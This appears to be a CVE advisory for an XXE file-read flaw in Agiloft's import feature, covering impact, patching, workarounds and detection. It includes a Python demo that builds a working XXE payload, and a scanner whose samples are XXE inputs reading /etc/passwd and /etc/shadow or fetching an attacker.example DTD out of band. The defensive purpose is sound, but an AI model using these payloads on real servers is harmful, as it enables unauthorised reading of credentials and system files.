CVE-2025-35112

4.1 MEDIUM

📋 TL;DR

Agiloft Release 28 contains an XML External Entity (XXE) vulnerability in its import/export functionality. An authenticated user who can import into a table can submit an XML file whose DTD declares an external entity pointing at a local path; when the server parses the file the entity is expanded and the target file's contents come back in the imported data, giving path traversal and arbitrary read of any file the Agiloft server process can open. It affects all Agiloft installations running Release 28 with import/export enabled on any table. Only authenticated users can exploit this vulnerability.

💻 Affected Systems

Products:
  • Agiloft
Versions: Release 28
Operating Systems: All platforms running Agiloft
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in any table that has import/export functionality enabled. The vulnerability is present by default in affected versions.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An authenticated malicious insider could read sensitive system files, application configuration files, or credentials stored on the server filesystem (anything readable by the Agiloft server process), and use what is recovered to reach systems beyond their Agiloft permissions.

🟠

Likely Case

Authenticated users with import/export permissions could read arbitrary files from the server filesystem, potentially exposing configuration data or other sensitive information.

🟢

If Mitigated

With import/export restricted to a small set of trusted users and their imports monitored, exposure is limited to those users; note that until the patch is applied they can still read server-side files well beyond what their Agiloft permissions grant.

🌐 Internet-Facing: MEDIUM - While authentication is required, internet-facing instances could be targeted by attackers who have obtained valid credentials.
🏢 Internal Only: MEDIUM - Internal users with import/export permissions could exploit this for unauthorized file access.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Exploitation requires an authenticated account with import permission on at least one table and a crafted XML import file whose DOCTYPE declares an external entity (for example SYSTEM "file:///...") and references it in a field. The payload itself is standard XXE; the effort lies in obtaining credentials, not in the file.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Agiloft Release 31

Vendor Advisory: https://wiki.agiloft.com/display/HELP/What%27s+New%3A+CVE+Resolution

Restart Required: No

Instructions:

1. Backup your Agiloft instance.
2. Upgrade to Agiloft Release 31 following vendor upgrade procedures.
3. Verify the upgrade completed successfully.
4. Test import/export functionality.

🔧 Temporary Workarounds

Disable Import/Export Functionality (applies to: all platforms)

Temporarily disable import/export functionality on all tables until patching can be completed.

Navigate to Table Settings > Permissions > Disable 'Import/Export' for all user roles

Restrict XML Processing (applies to: all platforms)

Configure the XML parser to disable external entity processing (external general and parameter entities, and ideally DTDs altogether) if your environment exposes that setting. In a packaged product this is usually not an option available to the administrator, so treat it as secondary to disabling import/export; do not assume it is applied unless you can verify it against a test import.
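The following is an added example, not Agiloft's code and not taken from the vendor advisory. It shows both the payload shape described above under Exploit Status and the parser setting this workaround refers to. Python's standard-library xml.sax (expat) stands in for the application's importer: the same import file is parsed once with external general entities enabled (the vulnerable configuration) and once with them disabled. The secret file, the <records>/<value> element names and the import routine are all constructed for the demonstration.

```python
"""XXE in an XML importer: the payload, the leak, and the parser setting
that stops it.  Added example, not Agiloft code.  Python's stdlib xml.sax
(expat) stands in for the application's importer; its feature_external_ges
switch is the "disable external entity processing" knob.  The secret file,
the <records>/<value> schema and the import routine are constructed here."""
from __future__ import annotations

import io
import os
import pathlib
import tempfile
from xml import sax
from xml.sax import handler
from xml.sax.handler import ContentHandler


class _ValueCollector(ContentHandler):
    """Collects the text of every <value> element, as a field importer would."""

    def __init__(self) -> None:
        super().__init__()
        self.values: list[str] = []
        self._buf: list[str] | None = None

    def startElement(self, name, attrs):
        if name == "value":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "value":
            self.values.append("".join(self._buf))
            self._buf = None


def build_xxe_payload(target_uri: str) -> str:
    """The classic file-read payload: the internal DTD subset declares an
    external general entity whose SYSTEM identifier is the file to read,
    and a field references it.  A parser that resolves external entities
    substitutes the file's contents into that field."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE records [<!ENTITY xxe SYSTEM "{target_uri}">]>\n'
        "<records><record><value>&xxe;</value></record></records>"
    )


BENIGN_IMPORT = "<records><record><value>hello</value></record></records>"


def import_records(xml_text: str, resolve_external_entities: bool) -> list[str]:
    """Parse one import file and return the imported field values.

    resolve_external_entities=True is the vulnerable configuration.  With it
    False (CPython's default since 3.7.1) the external entity reference is
    dropped and nothing is read from disk."""
    parser = sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    # External parameter entities (<!ENTITY % x SYSTEM ...>) are the other
    # XXE vector (remote DTDs, out-of-band exfiltration); keep them off too.
    parser.setFeature(handler.feature_external_pes, False)
    collector = _ValueCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return collector.values


def demo() -> dict[str, list[str]]:
    """Run the same payload through both configurations against a secret
    file created in a temp directory (a constructed stand-in for a server
    configuration file)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "app.properties")
        with open(secret, "w", encoding="utf-8") as fh:
            fh.write("db.password=s3cret")
        payload = build_xxe_payload(pathlib.Path(secret).as_uri())
        return {
            "vulnerable": import_records(payload, resolve_external_entities=True),
            "hardened": import_records(payload, resolve_external_entities=False),
            "benign": import_records(BENIGN_IMPORT, resolve_external_entities=False),
        }


if __name__ == "__main__":
    for mode, values in demo().items():
        print(f"{mode:10s} -> {values!r}")
```

The vulnerable run returns the contents of app.properties as an imported field value; the hardened run returns an empty value for the same payload and still imports the benign file normally. In a Java application such as Agiloft the equivalent switches are the XMLInputFactory / DocumentBuilderFactory features that disallow DOCTYPE declarations and external general and parameter entities; which of those the product exposes, if any, is not something this page establishes.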

🧯 If You Can't Patch

  • Restrict import/export permission to the smallest possible set of trusted users on each table, and remove it from every role that does not need it
  • Monitor import activity for XML files carrying DOCTYPE or ENTITY declarations, and for unexpected outbound connections from the application server during imports

🔍 How to Verify

Check if Vulnerable:

Check the Agiloft version in the admin interface. If the version is Release 28, the system is vulnerable. Releases between 28 and the fixed Release 31 are not covered by this page; confirm their status against the vendor advisory rather than assuming they are safe.

Check Version:

Check Agiloft admin dashboard or use vendor-specific version check command for your installation.

Verify Fix Applied:

After upgrading to Release 31, verify version in admin interface and test import/export functionality with safe files.

📡 Detection & Monitoring

Log Indicators:

  • Import requests whose XML body carries a DOCTYPE declaration; a legitimate table import has no reason to include a DTD
  • <!ENTITY ... SYSTEM "file:..."> or <!ENTITY % ...> declarations in submitted XML (the direct file-read and out-of-band variants respectively)
  • Multiple failed or unusually small imports from one account in a short window (an attacker iterating on a payload)
  • Import operations referencing unusual file paths (../, /etc/, /root/, application configuration directories), where the product logs the entity target or the resulting field contents

Network Indicators:

  • Large or unusually structured XML uploads to import endpoints
  • Unexpected outbound HTTP, FTP or DNS traffic from the Agiloft server to external hosts during an import (out-of-band XXE fetching a remote DTD or exfiltrating file contents)

SIEM Query:

Illustrative only: the field names depend on what your Agiloft deployment and any reverse proxy actually log, and the content clauses require the request body or a stored copy of the import file to be available to the SIEM.

source="agiloft" AND (event="import" OR event="export") AND (body CONTAINS "<!DOCTYPE" OR body CONTAINS "<!ENTITY" OR file_path CONTAINS ".." OR file_path CONTAINS "/etc/" OR file_path CONTAINS "/root/")
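As an added example of the content-level indicators above (not Agiloft code, and independent of what the product actually logs), this Python scanner flags the XXE markers in an XML import body: a DOCTYPE, an external DTD, external general or parameter entities, and whether each SYSTEM identifier points at a local file or a remote host (the out-of-band case). It decodes from the byte-order mark first because a UTF-16 payload evades a naive byte match on "<!DOCTYPE". It can serve as a pre-parse gate in an import pipeline or run over captured request bodies. The sample import bodies, including the attacker host, are constructed.

```python
"""Scan XML import bodies for XXE indicators.  Added example, not Agiloft
code.  Operates on raw bytes and decodes by BOM / XML declaration first,
since a UTF-16 payload slips past a byte-level "<!DOCTYPE" check.  The
sample import bodies below (and attacker.example) are constructed."""
from __future__ import annotations

import re

# XML keywords are case-sensitive, so these patterns deliberately are too.
_DOCTYPE = re.compile(r"<!DOCTYPE\b")
_DOCTYPE_EXTERNAL = re.compile(
    r"<!DOCTYPE\s+\S+\s+(?:SYSTEM\s+(?P<qa>[\"'])(?P<sys1>.*?)(?P=qa)"
    r"|PUBLIC\s+(?P<qb>[\"']).*?(?P=qb)\s+(?P<qc>[\"'])(?P<sys2>.*?)(?P=qc))",
    re.DOTALL,
)
_ENTITY = re.compile(
    r"<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?:SYSTEM\s+(?P<q1>[\"'])(?P<sys1>.*?)(?P=q1)"
    r"|PUBLIC\s+(?P<q2>[\"']).*?(?P=q2)\s+(?P<q3>[\"'])(?P<sys2>.*?)(?P=q3))",
    re.DOTALL,
)


def decode_xml_bytes(data: bytes) -> str:
    """Decode by BOM, then BOM-less UTF-16 heuristics, then the XML
    declaration's encoding pseudo-attribute, else UTF-8."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    if data[:3] == b"\xef\xbb\xbf":
        return data[3:].decode("utf-8", "replace")
    if data[:2] == b"<\x00":
        return data.decode("utf-16-le", "replace")
    if data[:2] == b"\x00<":
        return data.decode("utf-16-be", "replace")
    m = re.match(rb"<\?xml[^>]*encoding=[\"']([A-Za-z0-9._-]+)[\"']", data)
    if m:
        try:
            return data.decode(m.group(1).decode("ascii"), "replace")
        except LookupError:
            pass
    return data.decode("utf-8", "replace")


def classify_uri(uri: str) -> str:
    """local_file for file: URIs and absolute paths, remote for any other
    scheme (http, ftp, jar, ...), relative otherwise."""
    u = uri.strip()
    low = u.lower()
    if low.startswith("file:") or u.startswith("/") or re.match(r"^[a-z]:[\\/]", low):
        return "local_file"
    if re.match(r"^[a-z][a-z0-9+.-]*:", low):
        return "remote"
    return "relative"


def scan_xml(data: bytes) -> dict:
    """Return findings (ordered, de-duplicated), the external entities seen,
    and a severity: high for any external entity or external DTD, medium
    for a bare DOCTYPE (an import has no business carrying one), else none."""
    text = decode_xml_bytes(data)
    findings: list[str] = []
    entities: list[dict] = []

    def note(tag: str) -> None:
        if tag not in findings:
            findings.append(tag)

    if _DOCTYPE.search(text):
        note("doctype")
    m = _DOCTYPE_EXTERNAL.search(text)
    if m:
        note("external_dtd")
        note(classify_uri(m.group("sys1") or m.group("sys2") or "") + "_uri")
    for m in _ENTITY.finditer(text):
        uri = m.group("sys1") if m.group("sys1") is not None else m.group("sys2")
        target = classify_uri(uri)
        entities.append({"name": m.group("name"), "parameter": bool(m.group("pe")),
                         "uri": uri, "target": target})
        note("parameter_entity" if m.group("pe") else "external_entity")
        note(target + "_uri")
    if any(f in ("external_entity", "parameter_entity", "external_dtd") for f in findings):
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "block": bool(findings), "findings": findings, "entities": entities}


# Constructed sample import bodies.
SAMPLES = {
    "benign": b"<records><record><value>hello</value></record></records>",
    "internal_entity_only": b'<!DOCTYPE r [<!ENTITY co "Acme Corp">]><r><v>&co;</v></r>',
    "file_read": b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r><v>&xxe;</v></r>',
    "oob_parameter_entity": b'<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]><r/>',
    "external_dtd": b'<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>',
    "utf16_file_read": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "/etc/shadow">]><r><v>&xxe;</v></r>'.encode("utf-16"),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        result = scan_xml(body)
        print(f"{label:22s} {result['severity']:6s} {result['findings']}")
```

Blocking on any DOCTYPE is deliberate: the internal-entity-only sample is harmless by itself, but an importer that accepts DTDs at all is one parser setting away from the file-read case, and refusing the declaration outright is simpler to reason about than trying to enumerate safe ones. The regular expressions are an indicator scanner, not a parser; for the gate that actually protects the application, rely on the parser configuration.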
